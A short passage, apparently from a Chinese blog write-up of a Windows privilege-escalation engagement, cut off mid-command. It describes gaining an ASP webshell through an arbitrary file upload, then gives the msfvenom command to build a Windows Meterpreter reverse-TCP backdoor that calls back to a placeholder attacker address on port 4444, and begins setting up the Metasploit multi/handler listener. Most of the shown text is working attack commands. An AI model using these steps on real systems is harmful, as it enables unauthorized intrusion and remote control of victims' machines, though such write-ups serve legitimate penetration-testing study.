https://ryaninf.github.io/2019/07/10/%E8%AE%B0%E4%B8%80%E6%AC%A1Windows%E6%8F%90%E6%9D%83%E8%BF%87%E7%A8%8B/
通过任意文件上传获取到ASP webshell 生成msf meterpreter后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > shell1.exe 启动监听 use exploit/multi/handler set PAYLOAD windows/met